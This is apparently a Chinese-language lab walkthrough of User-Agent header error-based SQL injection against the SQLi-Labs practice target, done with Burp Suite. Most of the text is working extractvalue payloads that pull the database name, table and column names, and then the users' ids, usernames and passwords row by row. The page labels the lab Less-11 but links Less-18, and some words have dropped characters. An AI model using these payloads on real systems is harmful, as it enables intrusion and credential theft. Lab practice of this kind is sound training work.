实验环境
攻击机:Windows10
安装应用软件:Sqlmap、Burpsuite、FireFox浏览器插件HackBar等
靶机:SQLi-Labs
安装应用软件:apache、MySQL、PHP;DVWA、SQLi-Labs漏洞 站环境
实验步骤
1.访问SQLi-Labs 站
访问靶机SQLi-Labs上的Less-11:
http://靶机ip/sql/Less-18
2.利用Burpsuite工具爪包
(1)启动Burpsuite
(2)设置Burpsuite的代理服务端口
(3)开启拦截功能
(4)设置代理服务器
(5)利用Burpsuite拦截HTTP请求
(6)将拦截到的HTTP请求包发送到Repeater模块
3.寻找注入点
在原始HTTP请求包的头部字段User-Agent末尾添加单引
发现服务器 错
在原始HTTP请求包的头部字段User-Agent末尾添加如下符
‘,”,”)#
服务器端未 错
由此可以判断,目标 站在POST参数处存在字符型注入。
4.获取 站当前所在数据库库名
使用以下payload参数获取 站当前数据库的库名
User-Agent: Mozilla/5.0……..Firefox/97.0′ and extractvalue(1,concat(‘~’,database())),”,”)#
显示结果为security
5.获取数据库security的全部表名
使用以下payload参数获取数据库security的全部表名
User-Agent: Mozilla/5.0……..Firefox/97.0′ and extractvalue(1,concat(‘~’,(select group_concat(table_name) from information_schema.tables where table_schema=’security’))),”,”)#
名为users的表肯存放 站用户的基本信息
6.获取users表的全部字段名
使用以下payload参数获取users表的全部字段名
User-Agent: Mozilla/5.0……..Firefox/97.0′ and extractvalue(1,concat(‘~’,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’))),”,”)#
7.获取users表id、username和password字段的全部值
(1)显示第一组数据
User-Agent: Mozilla/5.0……..Firefox/97.0′ and extractvalue(1,concat(‘~’,(select concat_ws(‘,’,id,username,password) from security.users limit 0,1))),”,”)#
(2)显示第二组数据
User-Agent: Mozilla/5.0……..Firefox/97.0′ and extractvalue(1,concat(‘~’,(select concat_ws(‘,’,id,username,password) from security.users limit 1,1))),”,”)#
(3)显示第三组数据
User-Agent: Mozilla/5.0……..Firefox/97.0′ and extractvalue(1,concat(‘~’,(select concat_ws(‘,’,id,username,password) from security.users limit 2,1))),”,”)#
以此类推,可以通过修改limit后面的参数,将users表中存放的所有用户信息全部暴露出来。
文章知识点与官方知识档案匹配,可进一步学习相关知识 络技能树首页概览23034 人正在系统学习中
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!